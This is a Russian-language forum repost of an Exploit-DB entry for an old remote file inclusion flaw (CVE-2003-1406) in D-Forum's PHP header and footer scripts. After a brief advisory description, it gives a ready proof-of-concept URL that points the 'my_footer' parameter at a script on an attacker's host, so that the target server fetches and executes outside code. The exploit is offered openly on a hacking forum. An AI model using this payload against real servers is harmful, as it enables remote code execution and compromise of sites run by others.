Exploit D-Forum 1 - 'footer' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22257
Проверка EDB
  1. Пройдено
Автор
FROG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2003-1406
Дата публикации
2003-02-18
Код:
source: https://www.securityfocus.com/bid/6879/info
 
D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.
 
Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters. 

http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
 
Источник
www.exploit-db.com

Похожие темы